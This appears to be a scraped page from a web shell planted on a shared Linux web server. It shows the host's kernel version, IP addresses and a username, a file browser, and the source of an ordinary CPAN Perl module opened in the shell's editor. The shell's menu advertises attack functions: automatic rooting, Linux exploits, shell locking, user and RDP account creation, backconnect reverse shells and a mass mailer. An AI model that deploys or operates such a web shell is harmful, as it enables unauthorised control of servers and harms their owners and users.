Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.20
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
perl5 /
User /
Identity /
Collection /
[ HOME SHELL ]
Name
Size
Permission
Action
Emails.pm
819
B
-rw-r--r--
Emails.pod
5.7
KB
-rw-r--r--
Locations.pm
871
B
-rw-r--r--
Locations.pod
5.72
KB
-rw-r--r--
Systems.pm
839
B
-rw-r--r--
Systems.pod
5.76
KB
-rw-r--r--
Users.pm
820
B
-rw-r--r--
Users.pod
5.69
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Systems.pm
# Copyrights 2003-2022 by [Mark Overmeer <markov@cpan.org>]. # For other contributors see ChangeLog. # See the manual pages for details on the licensing terms. # Pod stripped from pm file by OODoc 2.03. # This code is part of distribution User-Identity. Meta-POD processed with # OODoc into POD and HTML manual-pages. See README.md # Copyright Mark Overmeer. Licensed under the same terms as Perl itself. package User::Identity::Collection::Systems; use vars '$VERSION'; $VERSION = '1.01'; use base 'User::Identity::Collection'; use strict; use warnings; use User::Identity::System; sub new(@) { my $class = shift; $class->SUPER::new(systems => @_); } sub init($) { my ($self, $args) = @_; $args->{item_type} ||= 'User::Identity::System'; $self->SUPER::init($args); $self; } sub type() { 'network' } 1;
Close